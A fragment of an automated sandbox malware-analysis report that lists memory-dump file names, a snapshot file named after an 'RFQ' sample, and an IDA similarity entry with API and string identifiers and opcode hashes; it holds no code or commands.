                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: f9b3aaae2e07ba9db680c1d6bcba02e655a2d8163e6c9ac34e958cde3b91449d
                                                                                                                      • Instruction ID: 2785d8b5f6f281fef2d49fefba0451ef93b1273ee2ae9e037f993164d181455b
                                                                                                                      • Opcode Fuzzy Hash: f9b3aaae2e07ba9db680c1d6bcba02e655a2d8163e6c9ac34e958cde3b91449d
                                                                                                                      • Instruction Fuzzy Hash: 24D0C931780B127AF664BBB0AC4FFE66654BB06B51F000825B345AA1D5C9E4A800C768